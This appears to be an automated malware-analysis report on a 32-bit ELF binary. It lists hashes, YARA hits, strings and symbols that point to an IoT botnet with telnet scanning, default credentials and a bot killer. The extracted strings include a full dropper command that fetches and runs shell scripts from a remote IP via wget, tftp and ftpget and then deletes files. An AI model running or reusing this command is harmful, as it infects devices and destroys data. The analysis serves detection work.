Report #11627 check_circle

Binary
ABI
ELFOSABI_SYSV
Size
93.40KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
c139cec1081a50867d295ef95daf4098
sha1
ed415cd3293827e3f634ba8f332c95b1c320ec3e
crc32
0x407573ae
sha224
0cb2bb235281d047c6c96de0cc790fcbe6dbbb1fe931686fbea902b7
sha256
7dc750aa068b728dc3bc16a44c38f49073d5c675fd832afc3396f3a912a9e0b6
sha384
204744f4afb852d4a4fa999e091e82995fdd1ea9c44695965caf84cb8335c54b15678c1b66341cbfd886d61cab72d776
sha512
89b18f9b9acc11b6156a61d698ad7fe6e0ebf24da5d563d3ee9c051603e0f084c029ad33bbf5d5cdecc7e19932d1f7b9d6c43160df0b3e0cbd19dd6e9143a28c
ssdeep
1536:KSujS3LhdjFjZNWvsRPtlV6sLbp+c2SC10Nllf21tRxGamvcajVmQQoa:n3Lhdj8URPtv6sLblc1WURxPmvcaxmQE
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/net/route
Password

Suspicious
True check_circle
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs
27.118.21.217:23, Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41, cd /tmp || cd /var/run || rm -f *; wget http://27.118.21.217/sc.sh; busybox wget http://27.118.21.217/sc.sh; chmod 777 sc.sh; sh sc.sh; tftp 27.118.21.217 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 27.118.21.217; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 27.118.21.217 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf sc.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
URLs
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex), AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy), AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs), AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k), AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan), AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr), AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication), AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout), AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23), AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver), AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k), magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net), Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+), Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+), MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+), MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+), Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html), cd /tmp || cd /var/run || rm -f *; wget http://27.118.21.217/sc.sh; busybox wget http://27.118.21.217/sc.sh; chmod 777 sc.sh; sh sc.sh; tftp 27.118.21.217 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 27.118.21.217; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 27.118.21.217 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf sc.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
Mails

Suspicious
True check_circle
Strings
List
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
cd /tmp || cd /var/run || rm -f *; wget http://27.118.21.217/sc.sh; busybox wget http://27.118.21.217/sc.sh; chmod 777 sc.sh; sh sc.sh; tftp 27.118.21.217 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 27.118.21.217; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 27.118.21.217 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf sc.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
27.118.21.217:23
%s %s HTTP/1.1
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
User-Agent: %s
pkill -9 %s
Network is down
Machine is not on the network
No route to host
Host is down
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
been_there_done_that.3001
been_there_done_that
_fwrite.c
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d
open.c
write.c
contains_fail
Transport endpoint is not connected
No such process
Block device required
Remote address changed
No such device or address
Operation now in progress
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Connection reset by peer
Is a named type file
Link has been severed
Too many links
Too many open files
Too many open files in system
pass
No such device
Object is remote
REPORT %s:%s:%s
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
>%s.t && cd %s ; >retrieve
Operation not permitted
Connection: %s
8.8.8.8
dnslookup.c
Too many users
__GI_execl
__dns_lookup
__GI_fflush_unlocked
/etc/config/hosts
__libc_nanosleep
__GI_sleep
__nameserver
__open_nameservers
__socketcall
__GI_execve
__register_frame_info_bases
chroot.c
/etc/hosts
__GI_pipe
_Jv_RegisterClasses
get_telstate_host
__deregister_frame_info_bases
gethostbyname.c
gethostbyname_r
socket_connect
opennameservers.c
fflush_unlocked.c
__GI_nanosleep
nanosleep.c
read_etc_hosts_r.c
__socketcall.c
fflush_unlocked
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
socket.c
__nameservers
__read_etc_hosts_r
__open_etc_hosts
__get_hosts_byname_r
admin1234
__GI_socket
sleep.c
sendHTTP

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, a.c, c, Q, i.4251, printchar, prints, printi, print, fdopen_pids, hextable, C.379.6345, C.378.6344, C.377.6343, C.391.6402, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, chroot.c, close.c, dup2.c, fork.c, getdtablesize.c, getpid.c, getppid.c, getrlimit.c, ioctl.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, snprintf.c, sprintf.c, vsnprintf.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.4160, _fixed_buffers, _wcommit.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, spec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1330, _string_syserrmsgs.c, bcopy.c, strcasestr.c, strtok.c, next_start.1278, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, gethostbyname.c, buf.5162, h.5161, gethostbyname_r.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.3001, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, __C_ctype_tolower.c, errno.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, memchr.c, memmove.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, raise.c, dl-support.c, brk.c, kill.c, poll.c, fclose.c, fopen.c, fseeko.c, fseeko64.c, _adjust_pos.c, _fopen.c, _cs_funcs.c, fgets.c, fflush_unlocked.c, fgets_unlocked.c, strcmp.c, strncat.c, rawmemchr.c, strspn.c, strdup.c, ntop.c, inet_pton4, xdigits.3285, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, llseek.c, tolower.c, fgetc_unlocked.c, strcasecmp.c, encoded.c, decoded.c, lengthd.c, _READ.c, _rfill.c, _trans2r.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, __GI_execve, __libc_sigaction, chroot, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, __GI___glibc_strerror_r, waitpid, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, sysconf, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, __GI_h_errno, contains_fail, __length_question, __GI___ctype_toupper, __GI_strcasecmp, __GI_tolower, recv, connect, __encode_question, __GI___uClibc_fini, numpids, __encode_header, __GI_strncat, sigemptyset, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, inet_pton, __GI_snprintf, __GI_vsnprintf, __GI_setsid, memmove, __bsd_signal, snprintf, __GI_strpbrk, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, getc_unlocked, __ctype_b, __GI_random_r, usernames, errno, getegid, read_until_response, __GI_sbrk, zprintf, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, __libc_getpid, wildString, __xpg_strerror_r, fcntl64, prctl, memcpy, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, __GI_fgets, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, tolower, getuid, system, __open_etc_hosts, udp, malloc, isatty, sleep, __GI_atol, vsnprintf, __dns_lookup, __GI_read, __C_ctype_tolower, random_r, __dso_handle, clock_getres, gethostbyname_r, tcpcsum, reset_telstate, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, __GI_open, __GI_strchr, __searchdomain, sigaddset, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI_inet_ntoa, send, __fgetc_unlocked, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, __GI___ctype_tolower, write, environ, __GI_close, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, __GI_brk, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, __GI_strcmp, __GI_memmove, sendSTD, setstate, __decode_dotted, __stdio_READ, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, tmpdirs, __stdin, stdin, __GI_isatty, strcasestr, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, __decode_header, __GI___h_errno_location, __GI_memcpy, strcoll, tcp, wcsrtombs, _stdio_user_locking, strncpy, strcasecmp, htonl, sendto, RemoveTMP, __C_ctype_toupper, __GI___C_ctype_b, __GI_gethostbyname_r, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __GI___C_ctype_tolower, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, __GI_strcasestr, fork, __stdio_rfill, strncat, gotIP, __GI_sleep, sigaction, __GI_gethostbyname, _dl_phdr, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, ssh, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, _pthread_cleanup_push_defer, index, processCmd, __sigismember, fopen, __bss_start, __libc_open, getOurIP, get_telstate_host, memset, __GI_socket, main, __glibc_strerror_r, listFork, __GI___C_ctype_tolower_data, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, inet_ntoa, getppid, tcgetattr, __C_ctype_tolower_data, time, __libc_system, __GI_abort, poll, fdpopen, __get_hosts_byname_r, __stdio_init_mutex, __GI__exit, botkiller, strcmp, advances2, __nameserver, data_start, __GI_sysconf, __h_errno_location, matchPrompt, __C_ctype_b_data, __GI_inet_pton, gethostbyname, _stdio_fopen, advance_state, _fini, __GI_chdir, __vfork, __GI_mmap, contains_success, sprintf, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, socket_connect, __GI_waitpid, _stdio_term, __decode_answer, __GI_signal, stderr, fails, commServer, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __libc_fork, __atexit_lock, scanPid, rand_cmwc, advances, __libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, contains_string, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, contains_response, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, __searchdomains, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, __GI_connect, __curbrk, __libc_poll, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, __C_ctype_toupper_data, _dl_aux_init, _errno, atoi, successes, _stdio_openlist_del_lock, __GI_inet_aton, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, tel, setsid, __GI_inet_addr, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __GI___errno_location, readUntil, fcntl, read_with_timeout, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, __GI_getsockname, close, __libc_connect, passwords, __GI_strlen, mainCommSock, pids, strpbrk, _load_inttype, raise, useragents, free, sigprocmask, getsockname
Number
745
Reason
None
Suspicious
False cancel
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False cancel
Segments
Number
3
Suspicious
False cancel
Compilers
List
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2
Identified
166
Suspicious
True check_circle
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , frame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i386/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , a.c, , c, , Q, , i.4251, , printchar, , prints, , printi, , print, , fdopen_pids, , hextable, , C.379.6345, , C.378.6344, , C.377.6343, , C.391.6402, , libc/sysdeps/linux/i386/vfork.S, , __syscall_fcntl.c, , __syscall_fcntl64.c, , _exit.c, , chdir.c, , chroot.c, , close.c, , dup2.c, , fork.c, , getdtablesize.c, , getpid.c, , getppid.c, , getrlimit.c, , ioctl.c, , open.c, , pipe.c, , prctl.c, , read.c, , select.c, , setsid.c, , sigprocmask.c, , time.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_toupper.c, , __errno_location.c, , snprintf.c, , sprintf.c, , vsnprintf.c, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.4160, , _fixed_buffers, , _wcommit.c, , _vfprintf_internal.c, , _charpad, , _fp_out_narrow, , spec_base.4370, , prefix.4371, , _ppfs_init.c, , _ppfs_prepargs.c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , type_sizes, , spec_flags.4372, , qual_chars.4377, , spec_chars.4373, , spec_ranges.4374, , spec_or_mask.4375, , spec_and_mask.4376, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strchr.c, , strcpy.c, , strlen.c, , strncpy.c, , strnlen.c, , strstr.c, , __glibc_strerror_r.c, , __xpg_strerror_r.c, , unknown.1330, , _string_syserrmsgs.c, , bcopy.c, , strcasestr.c, , strtok.c, , next_start.1278, , isatty.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2827, , inet_makeaddr.c, , gethostbyname.c, , buf.5162, , h.5161, , gethostbyname_r.c, , connect.c, , getsockname.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , socket.c, , sigaddset.c, , sigempty.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , free.c, , __malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _stdlib_strto_l.c, , exit.c, , execl.c, , sleep.c, , sysconf.c, , __uClibc_main.c, , __pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_done_that.3001, , sigaction.c, , __restore_rt, , __restore, , __syscall_error.c, , libc/sysdeps/linux/i386/mmap.S, , __socketcall.c, , __syscall_rt_sigaction.c, , clock_getres.c, , execve.c, , getegid.c, , geteuid.c, , getgid.c, , getpagesize.c, , getuid.c, , munmap.c, , nanosleep.c, , sbrk.c, , wait4.c, , __C_ctype_tolower.c, , errno.c, , __h_errno_location.c, , wcrtomb.c, , wcsrtombs.c, , wcsnrtombs.c, , _WRITE.c, , _fwrite.c, , _trans2w.c, , _load_inttype.c, , _store_inttype.c, , _uintmaxtostr.c, , _fpmaxtostr.c, , fmt, , exp10_table, , memchr.c, , memmove.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , dnslookup.c, , mylock, , static_ns, , static_id, , opennameservers.c, , get_hosts_byname_r.c, , raise.c, , dl-support.c, , brk.c, , kill.c, , poll.c, , fclose.c, , fopen.c, , fseeko.c, , fseeko64.c, , _adjust_pos.c, , _fopen.c, , _cs_funcs.c, , fgets.c, , fflush_unlocked.c, , fgets_unlocked.c, , strcmp.c, , strncat.c, , rawmemchr.c, , strspn.c, , strdup.c, , ntop.c, , inet_pton4, , xdigits.3285, , inet_ntop4, , encodeh.c, , decodeh.c, , encodeq.c, , lengthq.c, , decodea.c, , read_etc_hosts_r.c, , llseek.c, , tolower.c, , fgetc_unlocked.c, , strcasecmp.c, , encoded.c, , decoded.c, , lengthd.c, , _READ.c, , _rfill.c, , _trans2r.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __read_etc_hosts_r, , __GI_execve, , __libc_sigaction, , chroot, , strcpy, , __GI_fcntl64, , recvLine, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , __GI_memchr, , __GI___glibc_strerror_r, , waitpid, , __open_nameservers, , __GI_fopen, , getrlimit, , ioctl, , _stdio_openlist_use_count, , __GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI___C_ctype_toupper_data, , __GI_time, , getgid, , sysconf, , stdout, , random, , __GI_strdup, , __GI_getpagesize, , getdtablesize, , __GI_h_errno, , contains_fail, , __length_question, , __GI___ctype_toupper, , __GI_strcasecmp, , __GI_tolower, , recv, , connect, , __encode_question, , __GI___uClibc_fini, , numpids, , __encode_header, , __GI_strncat, , sigemptyset, , __pthread_mutex_lock, , initConnection, , __sigdelset, , __GI_clock_getres, , __uClibc_fini, , memrchr, , geteuid, , inet_pton, , __GI_snprintf, , __GI_vsnprintf, , __GI_setsid, , memmove, , __bsd_signal, , snprintf, , __GI_strpbrk, , __stdio_trans2r_o, , munmap, , __GI_setsockopt, , __libc_stack_end, , __GI_fclose, , __GI_wcsnrtombs, , __GI_pipe, , _uintmaxtostr, , 